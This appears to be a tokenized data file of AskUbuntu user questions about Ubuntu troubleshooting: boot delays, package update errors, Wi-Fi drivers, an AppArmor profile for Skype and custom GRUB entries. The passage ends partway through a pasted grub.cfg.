487268	how do i contact the maintainer of an out of date mirror ?	i have been using ftp : //ftp.iitb.ac.in/distributions/ubuntu/ mirror for downloading new packages and updates . after firefox 30 released , i waited for many days for my 14.04 lts to upgrade from firefox 29 , but did n't get any upgrade . later i came to know that firefox 30 is already there in ubuntu repos . so , i switched to main server and got firefox 30 and many other updates . what could be reason , why my previous mirror did n't have latest packages ? if there 's a problem on server side , how can the maintainers of this particular mirror be contacted ?
487278	grub bootloader suddenly lags by 2 minutes - ubuntu 14.04/windows 7 dual-boot	i have a dual-boot ubuntu 14.04 lts and windows 7 home premium system . here are the basic hardware facts for my build : 1 ) processor : amd a10-5800k apu with radeon ( tm ) hd graphics ă 4 2 ) 64-bit os ; 8 gb ram 3 ) grub ( v.2.02~ beta 2-9 ) is installed on a western digital wd5000azrx 500 gb intellipower 64 mb cache sata 6.0 gb/s 3.5 '' internal hard drive . 4 ) the ubuntu 14.04 lts os is installed on this same drive ( see item # 1 above ) . 5 ) windows 7 home premium os is installed on an ocz technology 128 gb vertex 4 series sata 6.0 gb/s 2.5 '' solid state drive . 6 ) i have a second western digital wd10ezex 1 tb 64 mb cache sata 6.0 gb/s 3.5 '' internal hard drive which i use as storage for my windows files , i.e. , music , photos , docs , etc . 7 ) i do not have any external hard drives . the system has operated flawlessly since i built it in june 2013 . this morning , however , when i powered up my system , grub did not respond within seconds as it normally does . after the post ran , all i had was a flashing cursor -- -for about two minutes . however , after about 2 minutes , grub did execute , and i saw my normal screen which allows me to select either ubuntu 14.04 lts or windows 7 home premium . both ubuntu ubuntu 14.04 and windows 7 home premium worked normally after selection . however , after closing each os and rebooting , the problem persisted . using my ubuntu live usb , i installed boot-repair , and then executed boot-repair 's `` recommended repair . '' i then rebooted , but i still have the same problem -- -delayed grub action , then after about 2 minutes the grub os selection screen appears . here is my bootinfo summary url http : //paste.ubuntu.com/7690857 . i would appreciate any advice for correcting this problem which anyone can provide . thanks , rick
487283	new php5.3.10 update error	after receiving the latest announcement about security vulnerabilities of php5 ( ubuntu security notice usn-2254-1 ) i decided to upgrade my server , but i ran into some problems . the new packages listed are : libapache2-mod-php5 5.3.10-1ubuntu3.12 php5-cgi 5.3.10-1ubuntu3.12 php5-cli 5.3.10-1ubuntu3.12 php5-fpm 5.3.10-1ubuntu3.12 but no matter what i do i keep getting these errors . here is a typical output i get from console : # apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 4 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up libapache2-mod-php5 ( 5.3.10-1ubuntu3.12 ) ... /usr/bin/ucf : line 520 : awk : command not found dpkg : error processing libapache2-mod-php5 ( -- configure ) : subprocess installed post-installation script returned error exit status 127 setting up php5-cgi ( 5.3.10-1ubuntu3.12 ) ... /usr/bin/ucf : line 520 : awk : command not found dpkg : error processing php5-cgi ( -- configure ) : subprocess installed post-installation script returned error exit status 127 dpkg : dependency problems prevent configuration of php5 : php5 depends on libapache2-mod-php5 ( > = 5.3.10-1ubuntu3.12 ) | libapache2-mod-php5filter ( > = 5.3.10-1ubuntu3.12 ) | php5-cgi ( > = 5.3.10-1ubuntu3.12 ) | php5-fpm ( > = 5.3.10-1ubuntu3.12 ) ; however : package libapache2-mod-php5 is not configured yet . package libapache2-mod-php5filter is not installed . package php5-cgi is not configured yet . package php5-fpm is not installed . dpkg : error processing php5 ( -- configure ) : dependency problems - leaving unconfigured setting up php5-cli ( 5.3.10-1ubuntu3.12 ) ... /usr/bin/ucf : line 520 : awk : command not found dpkg : error processing php5-cli ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : libapache2-mod-php5 php5-cgi php5 php5-cli e : sub-process /usr/bin/dpkg returned an error code ( 1 ) this has never happened before , so assume this is the result of the latest update ? so far i have tried reinstalling packages in different ways , but i always come back to this error list . upd . : i am also running into the same error awk : command not found with other things ... p.s . the system is ubuntu 12.04.4 lts ( gnu/linux 3.2.0-64-generic-pae i686 )
487285	some icons are missing	after updating to gnome-shell 3.12 some windows lost some icons , see below : can someone tell me how to recover these icons ?
487286	i can only execute calibre as root ( with sudo ) . what should i do to be able to execute it without root privileges ?	i have installed calibre , but now i can only execute it with sudo calibre what should i do to be able to execute it without root privileges , that is , without sudo ? another problem associated with that is that all files and directories generated by calibre are owned by root .
487287	is there a way to change the contrast ?	colors are to washed out for my taste , want them to be bolder , darker . hp dv6 laptop ubuntu 14.04
487288	tangowithdjango .bashrc edit causing errors	i 'm currently doing the tango with django module and i 've edited my .bashrc as it lists . appending [ [ -s $ home/.pythonbrew/etc/bashrc ] ] & & source $ home/.pythonbrew/etc/bashrc to the end of it . however now whenever i try to do anything in the terminal it opens with awk : 1 : unexpected character ' . ' followed by , for example , command 'gedit ' is available in '/usr/bin/gedit' the command could not be located because '/usr/bin ' is not included in the path environment variable . any advice would be appreciated . thanks
487289	no battery indicator in ubuntu 14.04	my new and recent setup of ubuntu 14.04 on a dell inspiron 7437 ( laptop ) shows some peculiar behavior in terms of the battery indicator : if the laptop is connected to its power supply , the indicator works fine and shows the progress of charging and also discharging after i disconnect the power supply . however , if i then restart the laptop on battery , there is no battery indicator anymore ( which is really annoying on a laptop ... ) . it will return though once i connect it again to the power supply ... i have already reinstalled the service and tried several other fixes ( seems to be a common problem ... ) from the web but so far nothing has really worked yet .
487290	ubuntu 14.04 network indicator	ok ... so i 'm on ubuntu 14.04 64bit and my network indicator suddenly disapeared and it 's not showing up in the startup application list even after running `` show hidden applications '' in the terminal . is there a way to get it back ?
487294	anyway to use skype in apparmor ?	ubuntu 14.04 and skype 4.2 installed . i 've set up apparmor using the skype apparmor profile from this wiki . when i use apparmor with skype , it has no audio . is anyone using apparmor successfully with the latest skype ? how can i make this work ? update : the profile below is what i now use successfully . i commented out a few permissions that i think skype should n't have . if you have problems with this profile , then try removing all hashes ( # ) after line 15 , and reload the profile with apparmor_parser -r /etc/apparmor.d/usr.bin.skype . # last modified : tue jun 24 05:59:42 2014 # include < tunables/global > /usr/bin/skype { # include < abstractions/audio > # include < abstractions/consoles > # include < abstractions/dbus-session > # include < abstractions/gnome > # include < abstractions/kde > # include < abstractions/nameservice > # include < abstractions/video > deny /sys/devices/virtual/dmi/** r , deny owner @ { home } /docker** r , deny owner @ { home } /.mozilla/ r , deny owner @ { home } /.mozilla/** r , # /dev/ r , /dev/video [ 0-9 ] * mrw , # /etc/ r , /etc/asound.conf r , /etc/machine-id r , /etc/xdg/trolltech.conf r , # /etc/xdg/trolltech.conf rk , /etc/xdg/sni-qt.conf r , # /etc/xdg/sni-qt.conf rk , /sys/devices/pci*/*/usb [ 0-9 ] */*/ { idvendor , idproduct , speed } r , /sys/devices/system/cpu/cpu [ 0-9 ] */cpufreq/scaling_ { cur_freq , max_freq } r , # /tmp/** rwlk , /usr/bin/kde4-config mrpux , /usr/bin/skype mrix , /usr/bin/xdg-open mrpux , /usr/lib { ,32 } /libv4l/v4l2convert.so r , # /usr/lib { ,32 } /libv4l/v4l2convert.so mr , /usr/lib { ,32 } /skype/skype mrix , /usr/share/icons/*/index.theme r , # /usr/share/icons/*/index.theme rk , /usr/share/nvidia/nvidia-application-profiles-*-rc r , # /usr/share/skype/ r , /usr/share/skype/** r , # /usr/share/skype/lib/libqtwebkit.so.4 mr , / { run , dev } /shm/pulse-shm* r , # / { run , dev } /shm/pulse-shm* rwk , # /home/ r , owner @ { home } / r , owner @ { home } /.xauthority r , owner @ { home } /.cache/fontconfig/* r , owner @ { home } /.kde/** r , owner @ { home } /.skype/ r , owner @ { home } /.skype/** rwk , owner @ { home } /.config/skype/ r , owner @ { home } /.config/skype/** rwk , owner @ { home } /.config/trolltech.conf r , # owner @ { home } /.config/trolltech.conf rwk , owner @ { home } /.config/fontconfig/fonts.conf r , owner @ { home } /.config/gtk-3.0/bookmarks r , owner @ { home } /.config/oxygen-gtk/argb-apps.conf r , # owner @ { home } /.config/oxygen-gtk/argb-apps.conf rw , owner @ { home } /.config/pulse/cookie r , # owner @ { home } /.config/pulse/cookie rwk , owner @ { home } /.icons/** r , owner @ { home } /.kde4/share/config/gtkrc-2.0 r , owner @ { home } /.kde4/share/config/kdeglobals r , # owner @ { home } /.kde4/share/config/kdeglobals rwk , owner @ { home } /.kde4/share/config/oxygenrc r , owner @ { home } /downloads/ r , owner @ { home } /downloads/** rw , owner @ { proc } / [ 0-9 ] */cmdline r , owner @ { proc } / [ 0-9 ] */fd/ r , owner @ { proc } / [ 0-9 ] */status r , owner @ { proc } / [ 0-9 ] */task/ r , owner @ { proc } / [ 0-9 ] */task/ [ 0-9 ] */stat r , @ { proc } /*/net/route r , @ { proc } / [ 0-9 ] */net/arp r , @ { proc } /sys/kernel/ { ostype , osrelease } r , @ { proc } /sys/vm/overcommit_memory r , }
487298	hdmi is not working after installing amd catalyst control center	i am running ubuntu precise ( 12.04 ) , 3.5.0 kernel with a dual monitor setu-up on amd 6970 hd cayman video card . my hdmi video output was working fine until i installed a dual monitor set-up and upgraded my video drivers by installing amd catalyst control center . now my hdmi no longer works , the tv recognizes it but there is no video signal going through to the tv . when i select display manager with tv hooked-up to computer through hdmi it sees the tv but it does n't allow me to set it as a mirror of one of the desktops or to make it a desktop by itself ; however , when i restart 'ubuntu ' logo is seen on my tv and the starting info such as hd 's available and up to 'ubuntu ' logo but as soon as i get to the screen where i have to put in my password the screen on my tv goes blank . does anyone know what could be causing this ?
487302	how do i uninstall a program that i did not install using apt-get	i have installed a program called liggghts by following the installation instructions in this link : https : //github.com/cfdemproject/liggghts-public/wiki/installing-liggghts-on-ubuntu-12.x i had installed the mpi verison ( not the serial version ) and i can not figure out how to uninstall it . i want to uninstall it and then install the latest version of the same program so i do not want to remove the dependencies if that is possible . could you please tell me how i could do this ?
487304	how to i make a live ubuntu on my usb with persistence that can boot both from pc and mac ?	i 've got a 64 gb usb stick that i want a live ubuntu install on with persistence so i can store my files on it but ... her comes the catch i need the install to work both with pc ( 64bit ) and mac ( 64bit ) with intel processors i can install it so i can boot it from my mac and i can install it so i can install it from my pc but i ca n't install it so it will boot successful up on both . is this possible or am i aiming to high here ? if its possible can anyone point me towards how to do it ? on advance thanks
487306	install ubuntu 14.04 on macbook without refit laptop unable to boot	i have downloaded the and created a life usb for ubuntu 14.04 . now i know that i would normally install refit on the laptop however the operating system on the macbook is not currently functional . so is there any way to either install ubuntu 14.04 without refit or install it without actually booting os x ? if it matters the macbook will ask for my username and password and then get stuck on a white screen with a cross .
487309	why does archive manager extract files out of folders ?	there are a lot of archives i 'm trying to extract , but when i extract a folder with files in it or a folder with many folders and files in it , all the files are extracted out of the folders . how do i fix this ?
487310	how to give user server name instead of ip when connecting through ssh ?	i have a virtualbox on which i have installed ubuntu 12.04 . my host computer is mac os ( mavericks ) . i did a ssh key copy to my remote ( which is ubuntu server and i call it myubuntu ) . when i did ssh username @ myubuntu ssh : could not resolve hostname ubuntuhadoop : nodename nor servname provided , or not known but when i tried : ssh username @ 66.90.115.178 i was able to log in to the remote server ( which is myubuntu ) . why is it need that i give ip address it connects properply but not the servername . i am not sure if this is possible . but i found in one of youtube tutorials . ssh myubuntu ( not username @ myubuntu ) and logged onto the remote server , without username . is this possible ?
487311	unable to connect network after update - maybe driver issue ?	there are lots of similar questions , but i think my case is different because of a driver issue . so the problem is that my laptop can not connect to wireless network ( can not test for wired ) after the last upgrade to 12.04 version . during the upgrade i received an error : preparing to replace linux-firmware 1.79.1 ( using ... /linux-firmware_1.79.14_all.deb ) ... unpacking replacement linux-firmware ... dpkg : error processing /var/cache/apt/archives/linux-firmware_1.79.14_all.deb ( -- unpack ) : trying to overwrite '/lib/firmware/ar3k/athrbt_0x31010000.dfu ' , which is also in package bt-dw1705-firmware 0.1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) as this package is responsible for the wireless network , i think the problem is here . of course i searched it , but none of the suggested solutions worked ( could n't try some without internet ) . i also checked the other threads only about the update with no effect . some diagnostics frequently asked for : lspci 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 07 ) 02:00.0 network controller : qualcomm atheros qca9565 / ar9565 wireless network adapter ( rev 01 ) lsmod module size used by nls_iso8859_1 12714 1 joydev 17694 0 parport_pc 32867 0 ppdev 17114 0 rfcomm 47562 12 bnep 18240 2 snd_hda_codec_realtek 46366 1 snd_hda_codec_hdmi 36726 1 coretemp 13642 0 kvm_intel 137888 0 kvm 422160 1 kvm_intel ghash_clmulni_intel 13221 0 aesni_intel 51134 0 btusb 22432 0 cryptd 20531 2 ghash_clmulni_intel , aesni_intel aes_x86_64 17256 1 aesni_intel snd_hda_intel 43682 5 snd_hda_codec 188269 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 17765 1 snd_hda_codec dell_wmi 12682 0 sparse_keymap 13891 1 dell_wmi dell_laptop 17426 0 dcdbas 14491 1 dell_laptop snd_pcm 97523 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec dm_multipath 23306 0 scsi_dh 14589 1 dm_multipath snd_seq_midi 13325 0 snd_rawmidi 30750 1 snd_seq_midi snd_seq_midi_event 14900 1 snd_seq_midi snd_seq 61931 2 snd_seq_midi , snd_seq_midi_event rts5139 350620 0 snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq microcode 23030 0 i915 600141 2 uvcvideo 78117 0 videobuf2_core 33025 1 uvcvideo videodev 125126 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12861 1 uvcvideo ath3k 12918 0 bluetooth 212001 25 rfcomm , bnep , btusb , ath3k drm_kms_helper 49259 1 i915 videobuf2_memops 13405 1 videobuf2_vmalloc drm 290595 3 i915 , drm_kms_helper snd 83674 20 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device psmouse 102759 0 serio_raw 13216 0 i2c_algo_bit 13565 1 i915 fglrx 6728782 132 amd_iommu_v2 19228 1 fglrx soundcore 15092 1 snd snd_page_alloc 18573 2 snd_hda_intel , snd_pcm wmi 19257 1 dell_wmi video 19653 1 i915 mac_hid 13254 0 lp 17800 0 parport 46563 3 parport_pc , ppdev , lp hid_generic 12541 0 usbhid 47259 0 hid 105241 2 hid_generic , usbhid dm_raid45 78156 0 usb_storage 49288 1 ahci 25869 2 libahci 31434 1 ahci r8169 62741 0 xor 17153 1 dm_raid45 dm_mirror 22204 0 dm_region_hash 20962 1 dm_mirror dm_log 18565 3 dm_raid45 , dm_mirror , dm_region_hash btrfs 781180 0 zlib_deflate 27140 1 btrfs libcrc32c 12645 1 btrfs sudo lshw -c network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 07 serial : 74:86:7a:39:40 : dd size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:60 ioport:4000 ( size=256 ) memory : c0700000-c0700fff memory : c0400000-c0403fff *-network unclaimed description : network controller product : qca9565 / ar9565 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c0600000-c067ffff memory:9fb00000-9fb0ffff nmcli -f all -p nm status =============================================================================================================== networkmanager status =============================================================================================================== running version state net-enabled wifi-hardware wifi wwan-hardware wwan -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - running 0.9.4.0 disconnected enabled enabled enabled enabled disabled rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no thank you for your help .
487312	5.1 surround through home theater	i 'm new to ubuntu and i 'm trying to use my home theater system on my pc . it 's connected through s/pdif however in the sound settings it only sees it as stereo . i played a surround sound test on youtube , and my computer is only using left , right , and center . it 's playing low frequency sound through the sub , but its not detecting it as its own channel . any help is greatly appreciated .
487315	why does this action fix my wi-fi ?	i found the below answer to fix my intermittent wi-fi connection : ubuntu connect drops . worked for a while then started dropping again questions : can someone explain in plain english why would this work , because my connection was never asking for any other router 's authorization ? can someone also explain why the mac device address entry is entered in the bssid , while there is another mac device entry in the same pop-up box ? what is the conceptual difference between the two ?
487317	if an internal hdd is not mounted , is it still in function ?	i have a probably stupid question , but i 'm gon na try anyway i have both a ssd and a hdd on my laptop : if my hdd is data only , and not mounted unless i need something inside ( there 's no `` eject '' icon next to it in nautilus , just to be clear ) is it still in function ? i 'm asking for a simple reason : since ssd have no moving parts , do i still need to be careful while moving my laptop because of the hdd ? or when it 's not mounted the head is safely placed and there 's no risk usually associated with moving a powered laptop with a working hdd ? thanks in advance
487321	mupen64 installation	hey i am a new ubuntu user , i heard mupen64 is a good emulator for n64 , i really want to install it , i went to the software centre i did n't see it only the add-ons . i went online to look for it , i found another person ask the same question but unfortunately the guy who answered the question and said that the asking for the terminal code was a bad question so he gave a link . i clicked the link and ubuntu asked what program to open it in . i do n't know to find the programs and what program i need to find , i also went to the mupen64 website and downloaded it but i donât know how to run it . can anyone help ?
487323	route two usb mics to virtual sound device	i have 2 usb mics - i 'd like to use them to record in stereo using audacity , but it can only capture on one device at a time . i can easily switch between the two mics , but i ca n't select both at the same time . i heard once that i might be able to route those two mics to a `` virtual '' soundcard and record from that device in audacity . jack was what was suggested , but after searching , i ca n't seem to figure out what i need to do to connect those two mics to a single channel and record it to audacity . i assume this would effectively undo the stereo recording that i want , as it 's still only going to record from one device at a time , but i 'd still like to give it a try . is this possible to do , and if so , any suggestions/tutorials on how to do this ?
487325	problem with wifi and no ethernet port	so i did not click install third party software during installation . when i look for additional drivers , my wifi card is not showing up . the ethernet port of my computer is malfunctioning . however my router has a usb port so should i connect the internet via usb to ubuntu . does ubuntu support connecting internet via usb and how do i do that . ubuntu has been great however i am still a beginner please help
487327	plop bootmanager not loading from grub , attemped dual-boot with windows 7	so i recently tried to get plop bootmanager working on an hp pavilion 2000 series , i had to tweak the settings to make it load though , however , when i try to load it , i get something about `` zram does not support booting from 32 bit '' even though i am on a 64 bit pc , i do n't remember the message exactly though . while having fun with the bootloader settings , i also tested to see if grub would boot from a vmware virtual disk ... it did n't . i 'm also trying to install windows 7 in a dual-boot , but keep the grub bootloader and install windows 7 to a virtual disk , how can i do this ? here are the contents of some files /etc/grub.d/40_custom ! /bin/sh exec tail -n +3 $ 0 this file provides an easy way to add custom menu entries . simply type the menu entries you want to add after this comment . be careful not to change the 'exec tail ' line above . menuentry 'plop bootmanager ' { insmod ext2 set root='hd0 , gpt2' search -- no-floppy -- fs-uuid -- set=root 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe linux /boot/plpbt.bin } menuentry 'windows 7 ' { insmod ext2 set root='hd0 , gpt2' search -- no-floppy -- fs-uuid -- set=root 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe linux /home/eddy/vmware/windows_7/windows_7.vmdk } /boot/grub/grub.cfg # do not edit this file # it is automatically generated by grub-mkconfig using templates from /etc/grub.d and settings from /etc/default/grub # begin /etc/grub.d/00_header if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi if [ `` $ { next_entry } '' ] ; then set default= '' $ { next_entry } '' set next_entry= save_env next_entry set boot_once=true else set default= '' 0 '' fi if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_gpt insmod ext2 set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe else search -- no-floppy -- fs-uuid -- set=root 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else if [ x $ feature_timeout_style = xy ] ; then set timeout_style=menu set timeout=5 # fallback normal timeout code in case the timeout_style feature is # unavailable . else set timeout=5 fi fi end /etc/grub.d/00_header begin /etc/grub.d/05_debian_theme set menu_color_normal=white/black set menu_color_highlight=black/light-gray end /etc/grub.d/05_debian_theme begin /etc/grub.d/10_linux function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe else search -- no-floppy -- fs-uuid -- set=root 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe fi linux /boot/vmlinuz-3.13.0-29-generic.efi.signed root=uuid=58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-29-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ' { menuentry 'ubuntu , with linux 3.13.0-29-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-29-generic-advanced-58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe else search -- no-floppy -- fs-uuid -- set=root 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe fi echo 'loading linux 3.13.0-29-generic ... ' linux /boot/vmlinuz-3.13.0-29-generic.efi.signed root=uuid=58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-29-generic } menuentry 'ubuntu , with linux 3.13.0-29-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-29-generic-recovery-58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe else search -- no-floppy -- fs-uuid -- set=root 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe fi echo 'loading linux 3.13.0-29-generic ... ' linux /boot/vmlinuz-3.13.0-29-generic.efi.signed root=uuid=58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-29-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-advanced-58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe else search -- no-floppy -- fs-uuid -- set=root 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic.efi.signed root=uuid=58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-recovery-58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe else search -- no-floppy -- fs-uuid -- set=root 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic.efi.signed root=uuid=58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } menuentry 'ubuntu , with linux 3.11.0-19-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-19-generic-advanced-58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe else search -- no-floppy -- fs-uuid -- set=root 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe fi echo 'loading linux 3.11.0-19-generic ... ' linux /boot/vmlinuz-3.11.0-19-generic.efi.signed root=uuid=58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-19-generic } menuentry 'ubuntu , with linux 3.11.0-19-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-19-generic-recovery-58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe else search -- no-floppy -- fs-uuid -- set=root 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe fi echo 'loading linux 3.11.0-19-generic ... ' linux /boot/vmlinuz-3.11.0-19-generic.efi.signed root=uuid=58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-19-generic } menuentry 'ubuntu , with linux 3.11.0-12-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-12-generic-advanced-58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 